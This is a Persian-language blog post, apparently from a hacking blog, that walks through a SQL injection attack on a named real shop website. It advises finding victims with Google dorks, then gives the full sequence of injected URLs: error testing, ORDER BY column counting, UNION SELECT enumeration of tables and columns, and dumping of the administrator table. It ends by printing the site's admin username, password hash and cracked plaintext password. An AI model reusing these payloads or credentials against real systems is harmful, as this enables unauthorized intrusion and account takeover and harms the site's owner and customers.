کسب در آمد

𝓢𝓐ℬ𝓐𝓦𝓔ℬ

HλȻκίɴĢ@SεȻƲરίτϓ
DERAQOULA

DęЯǞqΦЦlǞ

𝓢𝓐ℬ𝓐𝓦𝓔ℬ

𝓢𝓐ℬ𝓐𝓦𝓔ℬ

در این پست هک سایت به روش تزریق کدهای  SQL رو باهم کار میکنیم

SQL بحثش خیلی طولانی و مفصله که در چند پست نمیشه درباره اش بحث کرد با این وجود به خاطر درخواست برخی از دوستان من تصمیم گرفتم چند پست مختصر و مفید درباره SQL و تزریق کدها رو قرار بدم تا بصورت عملی آشنایی اولیه رو آغاز کنیم.!

امروز میخواییم یه روش تزریق کد به سایت ها رو باهم کار کنیم

به متن آموزش خوب دقت کنید.!

ابتدا باید یه تارگت مناسب برای نفوذ پیدا کنید.

از دورک های گوگل هکینگ میتونید کمک بگیرید

لطفا تارگتی که تو آموزش ازش استفاده میشه رو بعد از هک غیرفعال نکنید!!!

بریم سر اصل مطلب

قربانی آموزش ، تارگت زیر هستش که یه سایت معمولیه

http://www.camiceriapiccolo.com/scheda.php

ابتدا به تارگتمون آی دی زیر رو اضافه میکنیم تا ببینیم اخطار میده یا نه

(تست خطا)

?id=1'

که به شکل زیر میشه

http://www.camiceriapiccolo.com/scheda.php?id=1'

اگه اخطار داد یعنی میتونیم تزریق کد رو شروع کنیم در غیر این صورت باید به دنبال روش دیگه ای باشیم.

اینجا میبینید که سایت اخطار میده. یعنی میتونیم بریم به مرحله بعدی...

باید ببینیم سایت چند تا table داره

برای اینکار از دستور زیر کمک میگیریم

+order+by+(عدد فرضی)--

بجای عدد فرضی در فرمول کلیه بالا یه عددی رو انتخاب میکنیم تا ببینیم تعداد table ها از عددی که انتخاب کردیم بیشتره یا نه

برای مثال عدد 32 رو انتخاب میکنیم

http://www.camiceriapiccolo.com/scheda.php?id=-1+order+by+32--

در عدد 32 سایت دوباره اخطار میده. که این اخطار به این معنیه که تعداد table ها کمتر از 32 هست.

عدد ها رو بصورت متوالی عوض میکنیم تا تعداد واقعی table هارو بدونیم برای مثال 30 و 29 و 28 و 27 و... رو تست میکنیم تا ببینیم در کدوم اخطار میده در کدوم اخطار نمیده

بلاخره میبینید که در 27 اخطار نمیده و در 28 اخطار میده

این یعنی تعداد table هامون 27 تا هست.

خوب الان ما میدونیم که 27 تا table وجود داره که باید از بین اینا دنبال table آسیب پذیر باشیم.

دوباره کد زیر رو به تارگتمون تزریق میکنیم.

+union+select+(تعداد)

که کل تارگت به صورت زیر میشه.(تمام table هارو تک تک نام میبریم)

http://www.camiceriapiccolo.com/scheda.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

در اینجا میبینید که table های آسیب پذیر 5 و 12 هستن

این یعنی ما کدهامون رو به این table ها میتونیم تزریق کنیم.

برای مثال برای نمایش ورژن SQL از کد زیر استفاده میکنیم و بجای table 5 تزریقش میکنیم

کد زیر رو بجای عدد 5 در کدهای بالا اضافه میکنیم

@@version

که به شکل زیر میشه

http://www.camiceriapiccolo.com/scheda.php?id=-1+union+all+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

میبینید که ورژن رو نمایش میده که از ورژن 5 استفاده کردن.!

حالا به دنبال table های مفیدی که به دردمون بخوره میگردیم.

اینبار بجای عدد 5 کد زیر رو قرار میدیم.

group_concat%28table_name%29

سپس کد زیر رو هم به ادامه تارگتمون اضافه میکنیم

+from+information_schema.tables+where+table_schema=database%28%29--

که کل تارگتمون به شکل زیر میشه

http://www.camiceriapiccolo.com/scheda.php?id=-1+union+all+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+where+table_schema=database%28%29--

با تزریق کردن این کدها اسم Table های مهم رو نمایش میده که به صورت زیر لیست شدن

administrator,categorie,download,ordini,ordini_dett
,prodotti,spese_spedizione,stati_spedizione
,zone_spedizione

که برای ما مهم ترینش administrator میباشد (میز مدیریت)

هر table که نیاز داشته باشیم رو باید ابتدا تبدیل به هگز کنیم.

وقتی administrator رو به هگز تبدیل کنیم به شکل زیر میشه.

0x61646D696E6973747261746F72

خوب حالا برای پیدا کردن column های این Table باید کد زیر رو تزریق کنیم.

group_concat%28column_name%29 ,+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F72

تارگت نهایی به شکل زیر خواهد بود.

http://www.camiceriapiccolo.com/scheda.php?id=-1+union+all+select+1,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,1,617,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F72--

میبینید که column های administrator رو به دست آوردیم که به شکل زیر میباشد.

id,userid,password,config_file,flag_attivo,ultimo_accesso

در این لیست یوزر و پسوورد برای ما مهم هستش که اونارو هم به شکل زیر میتونیم استخراجش کنیم.

group_concat%28userid,0x3a,password%29 ,+from+administrator--

تارگت نهایی به شکل زیر میشه...!

http://www.camiceriapiccolo.com/scheda.php?id=-1+union+all+select+1,2,3,4,group_concat%28userid,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,1,617,18,19,20,21,22,23,24,25,26,27+from+administrator--

خوب یوزر و پسوورد هم خودشون رو نشون دادن

piccolo:c1fd0cbfbaaaf25fcc1abb8cd8cd6118

پسوورد رو هشش کردن که به شکل زیر خواهد شد.

user: piccolo
pass: cam2011pass

امیدوارم راضی کننده بوده باشه و لاقل در حد آشنایی با SQL و روش تزریق کدها براتون مفید بوده باشه.

 

Comments (۰)
There Are No Comments Yet
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی